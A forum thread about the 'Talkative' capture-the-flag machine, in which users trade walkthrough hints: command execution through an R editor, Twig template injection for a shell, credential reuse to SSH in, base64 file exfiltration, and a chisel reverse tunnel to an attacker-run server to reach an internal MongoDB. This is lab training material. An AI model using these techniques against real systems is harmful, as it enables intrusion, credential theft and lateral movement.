Talkative machine discussion
(April 12, 2022, 09:32 AM)pentester10 Wrote:
(April 11, 2022, 03:44 PM)Internetdreams Wrote: easy rce on rjeditor -> try(system("bash -c 'id'", intern = TRUE))
on the container go on /root/ unzip the .omv containing passwords for /bolt/ on :80.
Login as [email protected]:<PASSWORD>
TWIG SSTI to RCE on theme editing ; you got a shell as www-data you can ssh as saul from here with previous creds.


How do I unzip the .omv file on the machine? Or how do I transfer that file to my machine?

base64 <filename>

and copy the output and paste the content into <filename>.b64 on your base machine

cat <filename>.b64 | base64 -d > filename.mov

unzip filename.mov
Reply
(April 14, 2022, 07:33 PM)cavour12 Wrote: How to ssh as saul??? I spawned a shell with www-data user privileges ...

I previously tried pivoting, and the -T option for the pseudo-terminal stdin problem ... obviously I tried from my host, but port 22 seems filtered !!

Any hint or tips for the user flag?


script -qc /bin/bash /dev/null

then try ssh
Reply
Rooted, what a hard box
Reply
Woot! I got it. Yay for the win

keep at it!
Reply
Which rshell did you guys use with SSTI? I'm not getting any callbacks
Reply
(May 31, 2022, 04:57 PM)yoske12 Wrote: [OpenSSH private key omitted]


user?
Reply
Anyone help!!!!!!!!!!

saul@talkative:~$ ./chisel client 10.10.x.x:8000 R:27017:172.17.0.2:27017
-bash: ./chisel: No such file or directory
saul@talkative:~$


help  :huh:
Reply
(July 20, 2022, 11:46 AM)bothack Wrote: Anyone help!!!!!!!!!!

saul@talkative:~$ ./chisel client 10.10.x.x:8000 R:27017:172.17.0.2:27017
-bash: ./chisel: No such file or directory
saul@talkative:~$


help  :huh:

Build chisel without the debug flags (it's -lgflags-"-s -w" or something) and reduce the size of the binary you have to pass by 30%.
Then do "upx brute chisel" to reduce it further. It should be like 2.5 megs compared to like 10 or 11. Not super important, but it's a good tip to know.

Then set up a basic python server and write chisel to /dev/shm or tmp. Do an md5sum on chisel to make sure it copied okay.


Then on the attacker: chisel server -p 8000 --reverse

On saul: ./chisel client 10.10.WhateverYourIPIs:8000 R:8001:172.17.0.2:27017

This tells it that you are listening at 8000. You want to access port 27017; you can access it at 8001.

Test it by going to 0.0.0.0:8001 in the browser. It should give a warning about accessing mongo through the port or something. If you see that, it's working. In real life you wouldn't really want to use quad 0's, but this is okay here.

Now install mongosh. In this example we are accessing port 27017 on port 8001, locally. We want to tell mongosh to use our local port that is port-forwarded.

mongosh --port 8001
Reply
Me in 90 degree heat: I'll run bsondump so I can read this dump

Computer: bitch you thought
Reply